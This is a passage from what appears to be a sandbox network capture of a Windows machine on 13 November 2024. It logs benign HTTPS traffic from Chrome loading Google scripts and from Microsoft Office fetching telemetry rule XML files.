62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 Data Ascii: Identifier: Apache-2.0\n*/\nvar Ld;_.Jd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLow
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 58 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 59 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 59 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 Data Ascii: onst b\u003d_.Xd();return new _.Yd(b?b.createScriptURL(a):a)};_.$d\u003dfunction(a){if(a instanceof _.Yd)return a.i;throw Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da
2024-11-13 19:39:29 UTC	814	IN	Data Raw: 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 Data Ascii: ction(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|nu
2024-11-13 19:39:29 UTC	397	IN	Data Raw: 31 38 36 0d 0a 76 41 6c 69 67 6e 5c 22 2c 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 71 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 74 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 72 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c Data Ascii: 186vAlign\",width:\"width\"};\n_.qe\u003dfunction(a){return a?a.defaultView:window};_.te\u003dfunction(a,b){const c\u003db[1],d\u003d_.re(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49756	142.250.186.164	443	7416	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-13 19:39:29 UTC	957	IN	HTTP/1.1 200 OK Version: 694010790 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 13 Nov 2024 19:39:29 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-13 19:39:29 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-13 19:39:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	49758	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:29 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 57085b9e-f01e-005d-1ca2-3413ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193929Z-r178fb8d765dbczshC1DFW33an00000001a000000000h74b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:29 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	49760	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:29 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:29 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193929Z-16547b76f7fdtmzhhC1DFW6zhc00000006h0000000006w68 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:29 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:29 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 9dcd50e6-101e-0034-2ca1-3496ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193929Z-r178fb8d765v4sc4hC1DFW62ec00000001m000000000133n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:29 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.5	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:29 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 8d97175c-301e-005d-0fa7-34e448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193929Z-1749fc9bdbdgs9sshC1DFWt6ws00000001mg0000000082mr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:29 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:30 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:30 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:30 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193930Z-16547b76f7ftdm8dhC1DFWs13g0000000hh000000000ktyv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:30 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:30 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:30 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:30 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193930Z-16547b76f7fdtmzhhC1DFW6zhc00000006h0000000006w91 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:30 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:30 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:30 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:30 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 53aae69c-201e-005d-6aa2-34afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193930Z-1749fc9bdbdfj9bwhC1DFWvdqg000000016000000000rz7h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:30 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:30 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:30 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:30 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 1d5973b4-701e-0050-2a24-326767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193930Z-16547b76f7fp46ndhC1DFW66zg0000000hq00000000072fa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:30 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:30 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:30 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193930Z-16547b76f7fp46ndhC1DFW66zg0000000hpg000000008x45 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:31 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
